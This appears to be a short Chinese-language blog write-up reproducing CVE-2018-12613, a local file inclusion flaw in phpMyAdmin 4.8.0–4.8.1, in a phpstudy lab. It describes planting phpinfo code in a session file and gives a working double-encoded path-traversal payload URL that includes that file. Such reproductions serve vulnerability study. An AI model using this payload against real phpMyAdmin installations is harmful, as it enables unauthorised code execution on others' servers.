(CVE-2018-12613) phpmyadmin 文件包含复现

分享 89 字 大概 1 分钟 302 次
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

影响版本

  • phpMyAdmin 4.8.0/4.8.1

复现环境

  • phpstudy
  • phpMyAdmin4.8.1

复现过程

session文件写入phpinfo

20200426155436.png

如图,即在tmp文件夹session文件中插入了phpinfo代码。

20200426155436.png

包含文件Payload

http://192.168.2.1/phpmyadmin481/index.php?target=db_sql.php%253f/../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_5mk01jm6mpq5114m9hrk53g0qhnkrrcq

复现截图

20200426155933.png

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想